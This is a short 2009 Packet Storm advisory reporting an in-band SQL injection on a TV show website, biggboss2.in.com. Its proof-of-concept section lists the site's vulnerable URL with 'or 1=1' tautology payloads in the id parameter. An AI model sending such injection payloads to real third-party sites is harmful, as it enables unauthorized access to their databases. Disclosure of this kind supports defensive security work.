biggboss2 SQL Injection

2009-02-18T00:00:00
ID PACKETSTORM:75025
Type packetstorm
Reporter Jaydeep Dave
Modified 2009-02-18T00:00:00

Description

                                        
                                            `====================================================================  
Website: http://biggboss2.in.com/  
  
Category: TV Show  
  
Vulnerability: Inband SQL Injection  
  
Founder: Jaydeep Dave[jaydipdave@gmail.com]  
  
Date: 16th Feb, 2009  
====================================================================  
  
== P O C ===========================================================  
  
URL:  
http://biggboss2.in.com/contestants.php?msgvote=0&id=10  
  
  
Vulnerable URL:  
http://biggboss2.in.com/contestants.php?msgvote=0&id=10 or 1=1  
http://biggboss2.in.com/contestants.php?msgvote=0&id=-10 or 1=1  
  
====================================================================  
  
`